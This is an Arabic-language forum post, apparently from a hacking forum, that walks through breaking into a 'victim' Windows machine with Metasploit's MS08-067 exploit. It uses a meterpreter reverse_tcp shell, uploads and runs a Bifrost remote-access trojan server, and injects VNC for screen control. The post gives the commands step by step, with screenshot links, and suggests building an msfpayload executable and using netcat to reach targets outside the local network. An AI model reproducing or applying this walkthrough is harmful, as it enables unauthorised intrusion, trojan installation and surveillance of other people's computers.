السلام عليكم طريقة اختراق جهاز الضحية بالميتا ورفع سيرفر بيفروست وكما سأتحدث عن سيطرة الجهاز بإستخدام playoad windows/vncinject تم تطبيق الشرح على جهاز افتراضي الشرح http://img194.imageshack.us/img194/9...0702183620.png إضغط علي window وبعد ذلك علي console ستفتح لنا النافذة التالية نكتب show exploits http://img27.imageshack.us/img27/5264/exploitscmd3.png ونختار windows/smb/ms08_067_netapi show payloads http://img25.imageshack.us/img25/3329/payloads.png ونختار windows/meterpreter/reverse_tcp أو نختارها مباشرة كما ف الصورة http://img16.imageshack.us/img16/7027/setexploit5.png والآن نقوم بتحديد IP الضحية وهو في هذه الحالة جهازي الإفتراضي RHOST = 192.168.56.101 ولا تنسي أن تضع قم جهازك LHOST =192.168.56.1 لتطبيق الثغرة نكتب exploit وبعد ذلك enter http://img139.imageshack.us/img139/4...chexploit6.png كما ترون في الصورة لقد نجحنا في تطبيق الثغرة والدخول لي الجهاز عن طريق port 445 ************************************************** لنري خيارات نكتب help والآن سنقوم برفع السيرفر بالأمر upload -r server.exe c:\ كما في الصورة التالية ولكن قبل تحميل السيرفر يجب نسخه في مجلد C:\Program Files\****sploit\Framework3 http://img200.imageshack.us/img200/9...oadserver6.png بعد رفع السيرفر نشغل برنامج الدوس للضحية بالأوامرالتالية: use -m process execute -f cmd.exe -c interact 3 كما في الصورة حسب رقم channel أو session المفتوح http://img37.imageshack.us/img37/6270/73006251.png لتشغيل السيرفر start server.exe ******************************************* وكما توضح الصورة نجاح تحميل السيرفر http://img213.imageshack.us/img213/9439/70700213.png والصور تعبر عن نفسها http://img190.imageshack.us/img190/6250/30769969.png شاشة الضحية http://img197.imageshack.us/img197/482/55987753.png لتطبيق payload windows/vncinject نقوم بنفس الخطوات السابقة ولكن بإستبدال windows/meterpreter/smb/ms08_067_netapi set windows/vncinject/reverse_tcp بتطبيق الثغرة ستفتح لنا الشاشة التالية http://img269.imageshack.us/img269/1700/11vncinject.png أما بنسبة للطريقة فهي طريقة إختراق داخل الشبكة لكن للإختراق خارج الشبكة يلزمك صنع البايلود الملف التنفيذي للإختراق خارج الشبكة من msfpayload والإتصال به عبر النت كات by marwen bogos (tunisien gasrini
قوانين المنتدى
